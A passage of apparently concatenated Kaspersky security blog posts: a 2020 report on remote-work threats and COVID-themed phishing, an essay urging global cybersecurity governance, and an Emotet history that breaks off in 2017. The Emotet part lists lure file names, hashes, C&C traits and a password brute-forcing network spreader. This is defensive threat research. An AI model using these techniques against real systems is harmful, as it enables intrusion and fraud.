  • Work-life balance: Staying at home has led to difficulties maintaining an appropriate work-life balance, with nearly a third of respondents (31%) from the same survey in April admitting that they were now working more, although 46% admitted they were now spending more time pursuing personal activities. However, by November, employee attitudes appear to have shifted in favor of remote work, with nearly three-quarters (74%) saying they were happy to never return to at least some of the traditional workplace dynamics.

When thinking about the traditional, ‘old ways of working’ what do you not want to go back to?

  • Productivity levels: As previously mentioned, studies have indicated that working remotely can actually lead to an increase in productivity. Kaspersky found that a full 40% of employees noticed no change in their productivity levels, with 29% admitting to being more productive. However, it is also important to note employees are still missing some aspects of the traditional workplace environment, chiefly seeing their colleagues face-to-face (34%).

Over the past few months, what, if anything have you missed about work?

Security issues: old, new and refreshed

As shown above, questions regarding remote work – good or bad, better or worse for employees, helpful or not for businesses – are not as obvious as they might seem at first glance. However, in this report, we will focus mainly on what remote work means for businesses and employees from a security perspective. One of the most critical questions of work-from-home security is related to employees’ awareness of the main concepts of cybersecurity. As shown by the survey, by April, 73% of workers had not received any IT security awareness training from their employer since they transitioned to working from home, leading employees to feel unprepared for facing cybersecurity issues that may arise when working remotely.

Moreover, our research showed that remote staff tended to overestimate the level of their knowledge of cybersecurity basics. In the early April of 2020, Kaspersky and Area9 Lyceum released an adaptive learning course for those transitioning to at-home working, covering the basics of secure remote operations. Analysis of anonymized learning results revealed that in 90% of the cases where learners selected an incorrect answer, they evaluated their feelings about the given response as “I know this” or “I think I know this”.

The most dangerous outcome of such a situation is “unconscious incompetence”, when a user is not even thinking about potential risks of some action, because it is habitual and seems to be appropriate.

Shadow IT

Meanwhile, the adoption of video conferencing, file storage services, file sharing services and personal messaging apps are all on the rise as we rely on the Internet for sharing information and keeping in touch for work purposes. Some employees are not strictly using their business accounts for work-related purposes.

Most common shadow IT in use

For example, 42% of workers say they are using personal email accounts for work and nearly half (49%) have admitted to increasing how often they do this. Additionally, 38% use personal messengers for work purposes, and 60% say they now do this more often because of working from home. File-sharing services that have not been approved by IT departments are also being used a lot, with 53% of respondents saying they are using these more often for work-related purposes. Using such services has great benefits for keeping staff connected but can come at a cost if one or more of them become a target for cybercriminals, as it can lead to both theft of corporate information and unauthorized access to internal resources of the company.

According to our telemetry, cybercriminals were actively trying to masquerade their malware as popular messengers and online conference applications that were used by remote workers to replace offline communications. Kaspersky detected 1.66 million unique malicious files spread under the guise of such applications.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Applications used as lures, January – November 2020 (download)

Once installed, these files would primarily load Adware – programs that flooded victims’ devices with unwanted advertising and gathered their personal data for third-party use, but in particular cases the same spreading technique is used to download malicious implants for targeted espionage.

RDP attacks

Naturally, working from home requires employees to log in to corporate resources remotely from their personal devices. One of the most common tools used for this purpose is RDP, Microsoft’s proprietary protocol that enables users to access Windows workstations or servers. Unfortunately, given that many offices transitioned to remote work with little notice, many RDP servers were not properly configured, something cybercriminals have sought to take advantage of to gain unauthorized access to confidential corporate resources.

The most common type of attack being used is brute-force, wherein criminals attempt to find the username and password for the RDP connection by trying different combinations until the correct one is discovered. Once it is found, the cybercriminals gain remote access to the target computer on the network.

Starting in the beginning of March, the number of Bruteforce.Generic.RDP attacks skyrocketed, resulting in the total number of the attacks within the first eleven months of 2020 reaching 3.3 billion. Within the same eleven-month period in 2019, Kaspersky detected 969 million such attacks worldwide.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

RDP attacks dynamics, January – November 2019 and 2020 (download)

Bring Your Own Device

A Kaspersky survey has found that a little more than two-thirds of respondents are using a personal computer to work from home, and nearly half have done so in the past. This kind of policy – Bring Your Own Device – has long been disputed in the cybersecurity world, as it tends to make corporate resources more vulnerable to attack. Even for those who have devices provided by their employers (55%), most do not separate their work and personal activities. In fact, a full 51% admit to watching adult content on the device they use for work, content that is frequently targeted by cybercriminals.

Activities workers are spending more of their time doing

Part of the problem with BYOD policies is that businesses that adopt them often do not accompany them with appropriate cybersecurity measures. The same survey that found that two-thirds of employees used their personal devices also found that half of companies with BYOD policies did not have policies in place to regulate their use – and only a third (32%) provided antivirus software for personal devices.

A virtual private network (VPN) allows for much more secure connections, but only 53% of workers are using one to access their corporate networks. This is particularly problematic if employees log in to corporate resources from unsecured public networks, say, in a coffee shop or restaurant. It is worth noting that, especially in smaller businesses, employees are storing documents with personally identifiable information. Should this information fall into the wrong hands, it would not only be problematic for the company, but would put the employer’s own privacy at risk.

In 2019, before remote work swept the world, Kaspersky found that over half (52%) of enterprises said that their breaches occurred as a result of employees’ inappropriate IT use. Working from home and using personal devices only compounds these risks, particularly when employees are not taught the appropriate cybersecurity policies or given the right tools.

Scam and phishing

One of the most common concerns for workers is related to phishing scams. For instance, more than a quarter (27%) of survey respondents say they have received malicious emails related to COVID-19 while working from home, an activity Kaspersky’s experts are paying strong attention to during the pandemic. Scammers may be trying to prey on worried workers who want to know more about the coronavirus pandemic.

According to Kaspersky telemetry, the amount of scam related to social payments increased fivefold in 2020 compared to the same period in 2019. Fraud emails of this kind offer various financial assistance, surcharges, allowances and other types of payments.

In another scenario, victims, receive email, purportedly from their HR departments, carrying important information about COVID-19 issued by the government institution (CDC) as an attachment. It comes in the form of an IMG file, which is just an enhanced carrier for malicious content capable of bypassing email filters.

Another popular topic to exploit in times like these is money. Many people have lost their jobs or are close to unemployment. In exploiting the need for money, the attackers are offering reimbursement plans to individual employees. This type of offers characteristically contains a URL that the recipient is asked to follow or an attachment that needs to be opened.

And of course, the attackers could not keep from exploiting the name of the WHO itself.

Using the WHO logo seems to be so effective that sometimes, it occupies half of the email content, again spreading hope and false promises of a vaccine.

One fraudulent mailshot disguised as a WHO newsletter offered tips about staying safe from COVID-19.

To get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. Whereas in the mailshots above, only a username and password were asked for, in later ones, a phone number was also requested.

In addition, we detected several emails supposedly from the WHO, containing documents with malware. The recipient was asked to open the attachment in DOC or PDF format, which allegedly offered coronavirus prevention advice. For example, this message contained a copy of Backdoor.Win32.Androm.tvmf:

There were other, less elaborate mailshots with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:

APT groups

The COVID-19 topic was also abused in the world of APTs, where multiple threat actors used it to create lures. This applies, for example, to such threat actors as IronHusky and TransparentTribe.

IronHusky / ViciousPanda

Documents used by this APT group normally contain VisualBasic macros or older exploits for Microsoft Office and, in the case of successful infection, they present decoy content such as shown here: a document in Mongolian, which looks like genuine correspondence between the Mongolian Ministry of External Affairs and China. It mentions concerns about the spreading epidemic in China and growing statistics in Asian countries.

TransparentTribe / MythicLeopard / APT36

This is another example of abusing the COVID-19 topic, this time by another APT group known as TransparentTribe, which reportedly has been active in South Asian countries, such as India and Pakistan. This time, it is an Excel spreadsheet which does not really change the medium of the attack from the previous case.

Ginp and tracking applications

Even those cybercriminals who were acting only in the financial field adapted to the circumstances. A good example is Ginp, a banking trojan for Android used in a campaign exploiting the COVID-19 topic. After Ginp received a special command, it opened a web page titled “Coronavirus Finder”. The page had a simple interface that showed the number of nearby people infected with the coronavirus and urged the user to pay a small amount for seeing their exact locations.

The web page offered the visitor to input bank card details to make the transaction. Once the details were entered, they went directly to the criminals, and nothing else would happen. The attackers did not even charge the victim the small amount. And of course, they did not show any information about the people infected with coronavirus, because they did not have any.

Home entertainment

Not all the threats are related to the work process directly. Employees are spending more time at home, playing games, ordering food and watching movies. Cybercriminals are aware of that and are doing their best to exploit this situation.

Gaming threats

According to our telemetry, in April 2020, the daily amount of attempts to visit malicious websites exploiting the gaming topic increased by 54% as compared to January. Interestingly, Minecraft was the most abused game, followed by Counter Strike: Global Offensive and The Witcher 3.

One of the most popular gaming platforms, Steam, was also frequently imitated by cybercriminals: the number of notifications from fake Steam sites increased by 40% between February 2020 and April. Cybercriminals’ main goal as usual is to persuade users to visit fraudulent sites or download and install malware, which could be anything from keyloggers to ransomware and miners.

Online cinemas

Online cinemas and streaming services were also used to lure users. Threat actors mimicked popular services, such as Netflix, Okko and IVI, to trick users, or simply used the titles of popular TV shows to name malicious files. The most popular TV shows among cybercriminals were Stranger Things, The Witcher, Sex Education and Orange Is the New Black.

This is just more proof that it is vital to use only official streaming services for watching media content and always stay alert while doing something online. In 2019, we published an extensive report on how cybercriminals had disguised malware as episodes of top TV shows. The results of the year 2020 are still waiting to be studied.

Phishing in delivery

Another topic is delivery services. As ordering of food and other products online grows in popularity, the number of scams abusing this topic is growing, too. One of the most common targets is Amazon clients, and in attempts to get them, phishers have used every trick they have: fake delivery confirmations, fake alerts of suspicious activity in the Amazon account, gift card fraud, etc. The names of other delivery services were also used in spam and phishing emails, mostly to give victims malware or links to fraudulent clones of well-known delivery websites.

Conclusion and recommendations

Overall, we have not seen anything conceptually new in the way attacks are executed or the techniques used by the attackers. Instead, we have seen them adapt to the current agenda and environment.

In the B2B sector, this manifested itself either in targeted attacks imitating email from specialized organizations, such as lures using the WHO logo and name, or attempting to take advantage of the fact that companies rapidly transitioned to remote work – often without having the time to ensure that proper security measures were in place. For example, brute-force attacks on RDP are not knew, but never before have so many employees used these protocols. That is likely the reason why they became the primary focus for attackers this year, as did instant messaging applications, with criminals increasingly spreading “fake” applications that mimicked popular ones used by businesses for remote collaboration.

While corporate and perimeter security remains important, the recent mass transition to remote work has shown all too clearly that even the best corporate security cannot compensate for a lack of user awareness. Especially with 60% of companies allowing employees to use their own devices for work, businesses must train their staff in cybersecurity best practices, so that they are aware of the risks and understand how to work securely with corporate resources. This cyberhygiene training must also be accompanied by changes in IT administration. IT needs to provide additional support to employees, making sure updates are applied on time and issues with connecting remotely are fixed promptly.

For many businesses, remote work is not a temporary solution. Many have already announced that, even after the pandemic subsides, work-from-home options and a hybrid model will become a permanent fixture of the employee experience. That means now is the time to reflect on the lessons of 2020 and begin creating a security strategy that protects you and your employees.

Moving forward, businesses will need to rethink the way their corporate networks are organized. Since all machines are not located in the office and hence, not connected to the corporate network, adjustments need to be made to ensure endpoints stay secure and corporate resources are protected. For example, for those with a corporate VPN, they need to take steps to ensure nothing illicit can be downloaded.

The world has been becoming more digital for years, but, in 2020, our entire lives moved online. Even self-described luddites had no choice but to use digital services: for shopping, business meetings, classes.  And yes – cybercriminals were ready to jump on this opportunity. Attackers attempted to exploit the COVID-19 topic in every way possible, and they were, quite often, successful.

Part of the problem is that, when we teach good Internet safety practices, we are typically speaking to active internet users. But the pandemic forced everyone to become an active internet user  even those who did not want to – and they were, naturally, more vulnerable to attack.

COVID-19 will not be the last crisis, nor will it be the last one attackers exploit for personal gain. Cybercriminals will always be ready to take advantage of disruptive current events. Moving forward, no matter who you are – whether you are a novice Internet user or an experienced one, whether you spend five hours a day online or thirty minutes – you need to be ready for the unexpected in cyberspace. The year 2020 has proven that. Fortunately, staying protected against an evolving set of cyber risks does not require any high tech or advanced programming skills. It just requires a little knowledge of basic cybersafety rules.

Here are some tips to help employers and businesses stay on top of any potential IT security issues and remain productive while staff are working from home:

  • Ensure your employees have all they need to securely work from home and know who to contact if they face an IT or security issue.
  • Schedule basic security awareness training for your employees. This can be done online and cover essential practices, such as account and password management, email security, endpoint security and web browsing. Kaspersky and Area9 Lyceum have prepared a free course to help staff work safely from home.
  • Take key data protection measures including switching on password protection, encrypting work devices and ensuring data is backed up.
  • Ensure devices, software, applications and services are kept updated with the latest patches.
  • Install proven protection software, such as Kaspersky Endpoint Security Cloud, on all endpoints, including mobile devices, and switch on firewalls.
  • Ensure you have access to the latest threat intelligence to bolster your protection solution. For example, Kaspersky offers a free COVID-19-related threat data feed.
  • Double-check the protection available on mobile devices. For example, it should enable anti-theft capabilities such as remote device location, locking and wiping of data, screen locking, passwords and biometric security features like Face ID or Touch ID, as well as enable application controls to ensure only approved applications are used by employees.
  • In addition to physical endpoints, it is important to protect cloud workloads and virtual desktop infrastructure. As such, Kaspersky Hybrid Cloud Security protects hybrid infrastructure of physical and virtual endpoints, as well as cloud workloads whether running on-premise, in a datacenter or in a public cloud. It supports integration with major cloud platforms, such as VMware, Citrix or Microsoft, and facilitates migration from physical to virtual desktops.

While there is a lot of responsibility on employers to keep corporate devices and networks secure, Kaspersky is also offering the following recommendations for consumers and workers during their time at home:

  • Ensure your router supports and works smoothly when transmitting Wi-Fi to several devices simultaneously, even when multiple workers are online and there is heavy traffic (as is the case when using video conferencing).
  • Regularly update your router to avoid potential security issues.
  • Set up strong passwords for your router and Wi-Fi network.
  • If you can, only do work on devices provided by your employer. Putting corporate information on your personal devices could lead to potential security and confidentiality issues.
  • Do not share your work account details with anybody else, even if it seems a good idea at the time.
  • Always feel able to speak to your employer’s IT or IT security team if you have any concerns or issues while working from home.
  • Follow the rules of cyberhygiene: use strong passwords for all accounts, do not open suspicious links from emails and IMs, never install software from third-party markets, be alert and use reliable security solution such as Kaspersky Security Cloud.
2020. december 7.

Researchers call for a determined path to cybersecurity

Despite our continuous research efforts to detect cyberattacks and enable defense, we often feel that we, as members of a global community, are failing to achieve an adequate level of cybersecurity.

This is threatening the proper development and use of information technologies and digital assets, and as a consequence, most of society’s current and future activities, from entertainment to democratic processes, including business, healthcare and industrial production.

We believe that such a failure can be explained by a lack of global willpower, double-dealing activities, and the lack of global regulations. Here, we develop these hypotheses and outline ideas to advance cybersecurity.

What we do, and how it is failing

Kaspersky’s Global Research and Analysis Team (GReAT) is made up of cybersecurity researchers. Our shared capabilities and expertise stem from multifaceted individual experiences and perspectives that can always be traced back to strong technical backgrounds. Each and every day, our skills are focused on clear goals: to anticipate, discover, detect, track and report cyberattacks. But our activities and findings are, first and foremost, a contribution to a broader mission: to build a safer world. Since our inception more than a decade ago, we have worked very hard – from awareness raising and media interviews to embedded firmware reverse engineering, as well as incident-response support, vulnerabilities research, malicious infrastructure hunting, code similarity heuristics development, discovery of major threat actors or advanced malicious frameworks, open-sourced tools, specialized training and expert talks at world-class conferences. As far as our expertise is concerned, we believe that we provide beneficial results to our customers, partners and the global community. We know from previous collaboration and published content that our colleagues at government bodies, other cybersecurity providers and private companies work just as hard and achieve tremendous results as well.

Yet, somehow, we are still failing. Cyberattack numbers, whatever their impact, from digital activities to unwanted or disastrous effects, keep skyrocketing every year. Cybercrime has never been so prevalent and real, reaching every possible device, from IoT to supercomputers, as well as network routers, smartphones and personal computers. Cyberattacks have become a go-to companion, wherever there is malicious intent to tackle competition, hijack accounts, spy on a partner, persecute a minority, disrupt critical infrastructure, influence electoral processes, steal knowledge or obtain money. Cyber-based conflicts keep escalating, to the point where there is now a trend around the globe to proclaim that cyberwar capabilities are being developed, and kinetic force could be used as a response to cyberattacks whenever deemed fit. And ransomware or state-sponsored cyberattacks kept hitting hard even when we are all confronted with a pandemic.

Our hypotheses and beliefs

Why does all that outstanding technical effort, an abundance of cybersecurity solutions, highly skilled workforces, and decades of awareness raising fail to tackle cyberthreats? Although a lack of concern, specialized technical knowledge, skilled resources and training may have kept the defense a few steps behind for a while, we think these factors are no longer a major barrier. Instead, we believe that issues surrounding governance and a sense of responsibility are now what primarily prevent mission success.

A lack of global willpower and instruments

First of all, we believe that there is a lack of high-level global desire for cooperation and governance to properly tackle cyberattacks and protect what is at stake. We all agree that every human being should be guaranteed a minimum set of rights, that the development of nuclear warheads should be limited, if not outlawed, or that warfare should be regulated and overseen. These crucial safeguards to peace and freedom did not come about by chance; they came from political willpower, international cooperation, continuously improved governance and determined enforcement.

However, states have not agreed yet about a binding treaty or about how existing international law applies to keep our digital world at peace. There are regular examples demonstrating the major negative effects of cyberattacks on businesses, nations and citizens (or “civilians”), and there have been some initiatives to assess how international law would apply to cyber operations, to globally combat cybercrime, or to establish norms of responsible behavior in cyberspace for states. But these initiatives are not coordinated or global enough, they don’t actually come with the expected regulations, cooperation and clear instruments to increase stability in cyberspace.

Are we waiting for more dramatic effects than those already caused by cyberattacks and cybercrime to advance cybersecurity with strong governance and regulation instruments? We believe that, on top of the intrinsic complexity of international cooperation, a crucial lack of willpower from states is preventing substantial advancement on cybersecurity.

Double-dealing

We believe that lots of players are double-dealing in the digital age. Cyberattacks appear to be highly profitable in the short-term, as they allow attackers and their sponsors to quickly and stealthily gather foreign and domestic intelligence, make money, disrupt or deter third parties, gain a strategic advantage over competitors or in warfare, circumvent regulations, or efficiently disseminate information. As a bonus, these malicious activities have a low entry cost, are subject to no monitoring, and for the most part go unattributed (thanks to, amongst other things, complex digital layers, bulletproof services and factors limiting interstate police cooperation). Therefore, perpetrators do not have to take responsibility for their actions and go unpunished – even when they do get exposed. Due to these convenient “cyber features”, state or non-state actors might easily be tempted to publicly promote and even act in favor of a safer world, while making sure they can also benefit from offensive activities that remain undetected and go unpunished. Such activities also promote the public and private development of cyberweapons, mercenary services, criminal activities, and the monetization of vulnerabilities instead of responsible disclosure. All this, in turn, harms the efforts of cybersecurity and enables proliferation.

But that’s not all when it comes to double-dealing: government bodies dedicated to cybersecurity and non-state actors can even play this dangerous game to some extent. Cybersecurity threat intelligence and data are of topmost interest to national defense and security management, as well as very valuable to the competitive cybersecurity business. It is a vital asset to the economy, and for detecting or deterring strategic threats. As a result, threat intelligence may not be shared and actioned as easily and broadly as it should, in a common determined path to cybersecurity, but might rather be guarded jealously for private interests. Private companies such as Kaspersky, however, do their best to proactively share intelligence and insights on investigations to the community for free.

Existing regulations are not (global) enough

We also feel that achieving cybersecurity is not possible without a stronger sense of responsibility from all public and private actors that play a role in the development and operation of our global digital space. Governments have already gone some way to fostering this sense over the years by creating or strengthening regulations on personal data processing or protection for critical information systems. While this has been a significant advancement towards cybersecurity, it has unfortunately not been enough.

Most of the cyberattacks we face and analyze do not actually leverage sophisticated technical vulnerabilities or tools, because they don’t need to. It is often way too easy to access the devices and networks owned by a public or private organization because elementary cybersecurity measures are still not implemented, and because the organization’s very own digital assets are not clearly identified or not controlled sufficiently. Every organization that processes digital data of personal significance, or develops or operates digital services, starting with those that benefit us the most, or contribute to our most vital needs, including governments, should be required to implement and demonstrate elementary cybersecurity frameworks. The associated regulations should be global, because cyberspace and digital assets are shared amongst all users around the world. It may not be possible to become invulnerable, but making cyberattacks more costly for the attackers while protecting our digital world a little more is doable.

On top of the lack of preventive and protective measures from many public and private organizations, another responsibility issue is blocking the road to cybersecurity. Cyberattacks cannot be carried out without leveraging publicly available commercial services, such as content hosting, development, infrastructure provision and mercenary services. First, it would seem obvious that any private organization that purposely engages in cyberattack operations or cyberweapons development should have its activities limited by regulations, and controlled by an impartial third party, in order to ensure that malicious activities are constrained by design, and that cyberweapons do not proliferate. Also, in order to maintain peace in the cyberworld, it is critical that any organization whose services are demonstrated to be leveraged to carry out cyberattacks is required to cooperate with cybersecurity organizations designated by an impartial third party, to contribute to cybersecurity investigations and demonstrate efforts to continuously prevent the malicious use of exposed services.

Digital services and information technologies that unintentionally support malicious cyber activities are – most of the time – developed to bring sound and useful outcomes. However, and for decades, vulnerability disclosures and cyberattacks have demonstrated that some technologies or uses are flawed by design and can be exploited by malicious actors. We can probably collectively accept that when the first information technologies were developed and deployed, it wasn’t easy to anticipate malicious uses, which is why cybersecurity efforts only came afterwards. But it is no longer possible nor tolerable to develop, deploy and operate technologies and services that have a global use potential, while ignoring existing threats, and without making them secure by design. Yet, even more vulnerabilities and malicious uses affect relatively modern services and technologies, from IoT and artificial intelligence systems to cloud infrastructures, robotics and new mobile networks. In order to anticipate and prevent malicious exploitation of modern technologies as much as it is reasonably possible, we believe that transparent vulnerability management and disclosure practices need to be developed further by both state and non-state actors; and that technologies or services that are used globally should be assessed by a global community of experts more often.

Last but not least, we also think that more threats could be better anticipated in the future if future generations are globally and systematically educated on information technologies and cybersecurity, whatever their origin or path. This will contribute to a safer world.

Our call and plans

It is rather unusual for cybersecurity researchers and experts to write on governance matters. We don’t pretend that our hypotheses are the most suitable, or the most comprehensive. But we definitely feel concerned, and strongly believe that the points we have raised are obstructing a common path to cybersecurity. Furthermore, we are pleased to note that most of our hypothesis and beliefs are actually shared with many others, as demonstrated in 2020 Paris Call consultation key takeaways, or the latest reports from the UN’s OEWG on “developments in the field of information and telecommunications in the context of international security”, to which Kaspersky contributed.

We feel it is now a good time to send a call to all governments and international bodies (and ultimately any citizen) that aim for a safer world: we urge you to demonstrate more willpower, and a more determined approach to cybersecurity, by tackling the exposed causes of failure. We ask you to cooperatively choose the long-term peace of our common digital assets, over short-term nationalistic or private interests. We do our part, and we want our expert efforts to be transformed and developed further. We hope for a safer world, and a long-standing peaceful common digital space. We will never achieve this without determined leadership and a global change towards a better common behavior.

A cooperative and global governing instrument

We need strong political and technological leaders to drive governments and international bodies towards a cooperative, determined and fast-paced road to cybersecurity. In order to continuously rationalize efforts, share insights and thoughts, enable regulation, control and take global measures, we need them to build a dedicated, strong, permanent and focused international instrument.

We believe that such an instrument could be hosted by the UN, should seek to tackle the causes of the failures that we exposed, and should help governments to enforce regulations and cooperatively take measures when they are needed.

In order to ensure a cooperative approach by design, to consider the whole spectrum of what is at stake, and to truly take the transnational nature of cyberspace into consideration, we believe that such an instrument should guarantee a continuous dialogue with representatives of governments, the private sector, civil society and the technical community. This would enable the creation of cooperative task forces that would provide broad cybersecurity expertise and assessments on various matters, including preventive and protective cybersecurity measures, vulnerability research, incident response, attribution, regulation, law enforcement, security and risk assessment of modern technologies, and cyber capacity building. It would also ensure that most findings are shared across nations and among cybersecurity players.

This governing instrument should also be able to build norms and regulations, and a cooperative approach to control the attribution of cyberattacks and sanctions against non-compliant behavior or crime, risk analysis, capacity building, and education for cybersecurity.

A binding treaty of responsible behavior in cyberspace

Nearly two decades ago, the UN started to task groups of government experts (GGE) to anticipate international security developments in the field of IT, and to advance responsible state behavior in cyberspace. One of the most notable outcomes, despite GGE’s debatable results and limited reach, is the definition of 13 principles that constitute the norms of responsible behavior in cyberspace. But after more than a decade, these principles are non-binding, apply to governments only, and have only been endorsed on a voluntary basis. We believe this is not enough, and that it may reflect the lack of willpower and commitment from our governing leaders to cybersecurity.

We believe that the norms for responsible behavior in cyberspace should be further developed together with guidance on how these norms should be implemented, be better at including non-state actors such as the private sector, civil society and the technical community. After that they should become binding for the international community – if they remain voluntary, why should the bad guys care?

As far as private companies are concerned, the norm could set transparency and ethics baselines. We must not fail to mention Kaspersky’s own Global Transparency Initiative, which we truly believe to be a good source of inspiration for setting a number of private sector norms. This includes (but is not limited to) independent reviews of processes, security controls and software code, relocation of data processing, as well as the ability for trusted partners, customers and government stakeholders to directly access and check software code or threat detection rules. A code of ethics or ethics principles, from the “FIRST” international CSIRTs community or from Kaspersky, that tackle the responsible disclosure of security vulnerabilities, could also be leveraged as inspiration for private company norms.

Global regulations and shared means for cybersecurity

In order to tackle residual double-dealing issues and regulation needs that we exposed in our hypotheses, the global governing instrument or guidance should build and support further common regulations, on top of the previously mentioned norms of behavior. Such global regulations would ensure a consistent baseline of security requirements, to prevent proliferation of cyberweapons, prevent and firmly condemn cyberattacks, implement cybersecurity controls, foster responsibility and facilitate cooperation. How, where, and under which terms this governing instrument or guidance can be established should be a discussion for both state and non-state actors to ensure that we all fully recognize our responsibility to keep the digital space secure.

Conclusion

We deal with cyberattacks of all kinds every day and monitor their context from various sources. Over the years, we have seen more and more malicious activities from more and more actors, but global cybersecurity has reached a ceiling, and it appears that the potential for cyber-based conflicts is still growing. During the COVID-19 pandemic we have once again observed just how vital information technologies and digital assets are to democracy, the economy, the development of society, security and entertainment.

We believe that now is still a good time for world leaders, international and regional organizations, the private sector, the technical community and civil society to collaborate on achieving long-term peace in cyberspace rather than focusing on the short-term interests of individual countries or private organizations.

2020. december 4.

The chronicles of Emotet

More than six years have passed since the banking Trojan Emotet was first detected. During this time it has repeatedly mutated, changed direction, acquired partners, picked up modules, and generally been the cause of high-profile incidents and multimillion-dollar losses. The malware is still in fine fettle, and remains one of the most potent cybersecurity threats out there. The Trojan is distributed through spam, which it sends itself, and can spread over local networks and download other malware.

All its “accomplishments” have been described thoroughly in various publications and reports from companies and independent researchers. This being the case, we decided to summarize and collect in one place everything that is currently known about Emotet.

2014 June

Emotet was first discovered in late June 2014 by TrendMicro. The malware hijacked user banking credentials using the man-in-the-browser technique. Even in those early days, the malware was multicomponent: browser traffic was intercepted by a separate module downloaded from the C&C server. Its configuration file with web injections was also loaded from there. The banker’s main targets were clients of German and Austrian banks, and its main distribution vector was spam disguised as bank emails with malicious attachments or links to a ZIP archive containing an executable file.

Examples of malicious emails with link and attachment

November

In the fall of 2014, we discovered a modification of Emotet with the following components:

  • Module for modifying HTTP(S) traffic
  • Module for collecting email addresses in Outlook
  • Module for stealing accounts in Mail PassView (a password recovery tool)
  • Spam module (downloaded additionally as an independent executable file from addresses not linked to C&C)
  • Module for organizing DDoS attacks

We came across the latter bundled with other malware, and assume that it was added to Emotet with a cryptor (presumably back then Emotet’s authors did not have their own and so used a third-party one, possibly hacked or stolen). It is entirely possible that the developers were unaware of its presence in their malware. In any event, this module’s C&C centers were not responsive, and it itself was no longer updated (compilation date: October 19, 2014).

In addition, the new modification had begun to employ techniques to steal funds from victims’ bank accounts automatically, using the so-called Automatic Transfer System (ATS). You can read more about this modification in our report.

December

The C&C servers stopped responding and the Trojan’s activity dropped off significantly.

2015 January

In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.

June

The C&C servers again became unavailable, this time for 18 months. Judging by the configuration file with web injects, the Trojan’s most recent victims were clients of Austrian, German and Polish banks.

2016 December

Emotet redux: for the first time in a long while, a new modification was discovered. This version infected web-surfing victims using the RIG-E and RIG-V exploit kits. This distribution method was not previously used by the Trojan, and, fast-forwarding ahead, would not be employed again. We believe that this was a trial attempt at a new distribution mechanism, which did not pass muster with Emotet’s authors.

The C&C communication protocol in this modification was also changed: for amounts of data less than 4 KB, a GET request was used, and the data itself was transmitted in the Cookie field of the HTTP header. For larger amounts, a POST request was used. The RC4 encryption algorithm had been replaced by AES, with the protocol itself based on a slightly modified Google Protocol Buffer. In response to the request, the C&C servers returned a header with a 404 Not Found error, which did not prevent them from transmitting the encrypted payload in the body of the reply.

Examples of GET and POST requests used by Emotet

The set of modules sent to the Trojan from C&C was different too:

  • Out was the module for intercepting and modifying HTTP(S) traffic
  • In was a module for harvesting accounts and passwords from browsers (WebBrowserPassView)
2017 February

Up until now, we had no confirmation that Emotet could send spam independently. A couple of months after the C&C servers kicked back into life, we got proof when a spam module was downloaded from there.

April

In early April, a large amount of spam was seen targeting users in Poland. Emails sent in the name of logistics company DHL asked recipients to download and open a “report” file in JavaScript format. Interestingly, the attackers did not try the further trick of hiding the executable JavaScript as a PDF. The calculation seemed to be that many users would simply not know that JavaScript is not at all a document or report file format.

Example of JS file names used:
 dhl__numer__zlecenia___4787769589_____kwi___12___2017.js (MD5:7360d52b67d9fbb41458b3bd21c7f4de)

In April, a similar attack involving fake invoices targeted British-German users.

invoice__924__apr___24___2017___lang___gb___gb924.js (MD5:e91c6653ca434c55d6ebf313a20f12b1)
telekom_2017_04rechnung_60030039794.js (MD5:bcecf036e318d7d844448e4359928b56)

Then in late April, the tactics changed slightly when the spam emails were supplemented with a PDF attachment which, when opened, informed the user that the report in JavaScript format was available for download via the given link.

Document_11861097_NI_NSO___11861097.pdf (MD5: 2735A006F816F4582DACAA4090538F40)

Example of PDF document contents

Document_43571963_NI_NSO___43571963.pdf (MD5: 42d6d07c757cf42c0b180831ef5989cb)

Example of PDF document contents

As for the JavaScript file itself, it was a typical Trojan-Downloader that downloaded and ran Emotet. Having successfully infected the system, the script showed the user a pretty error window.

Error message displayed by the malicious JavaScript file

May

In May, the scheme for distributing Emotet via spam changed slightly. This time, the attachment contained an Office document (or link to it) with an image disguised as an MS Word message saying something about the version of the document being outdated. To open the document, the user was prompted to enable macros. If the victim did so, a malicious macro was executed that launched a PowerShell script that downloaded and ran Emotet.

Screenshot of the opened malicious document ab-58829278.dokument.doc (MD5: 21542133A586782E7C2FA4286D98FD73)

Also in May, it was reported that Emotet was downloading and installing the banking Trojan Qbot (or QakBot). However, we cannot confirm this information: among the more than 1.2 million users attacked by Emotet, Qbot was detected in only a few dozen cases.

June

Starting June 1, a tool for spreading malicious code over a local network (Network Spreader), which would later become one of the malware modules, began being distributed from Emotet C&C servers.  The malicious app comprised a self-extracting RAR archive containing the files bypass.exe (MD5: 341ce9aaf77030db9a1a5cc8d0382ee1) and service.exe (MD5: ffb1f5c3455b471e870328fd399ae6b8).

Self-extracting RAR archive with bypass.exe and service.exe

bypass.exe:

  • Searches network resources by brute-forcing passwords using a built-in dictionary
  • Copies service.exe to a suitable resource
  • Creates a service on the remote system to autorun service.exe

Screenshot of the function for creating the service (bypass.exe)

Screenshot with a list of brute-force passwords (bypass.exe)

In terms of functionality, service.exe is extremely limited and only sends the name of the computer to the cybercriminals’ server.

Function for generating data to be sent to C&C

Function for sending data to C&C

The mailing was obviously a test version, and the very next day we detected an updated version of the file. The self-extracting archive had been furnished with a script for autorunning bypass.exe (MD5: 5d75bbc6109dddba0c3989d25e41851f), which had not undergone changes, while service.exe (MD5: acc9ba224136fc129a3622d2143f10fb) had grown in size by several dozen times.

Self-extracting RAR archive with bypass.exe and service.exe

The updated service.exe was larger because its body now contained a copy of Emotet. A function was added to save Emotet to disk and run it before sending data about the infected machine to C&C.

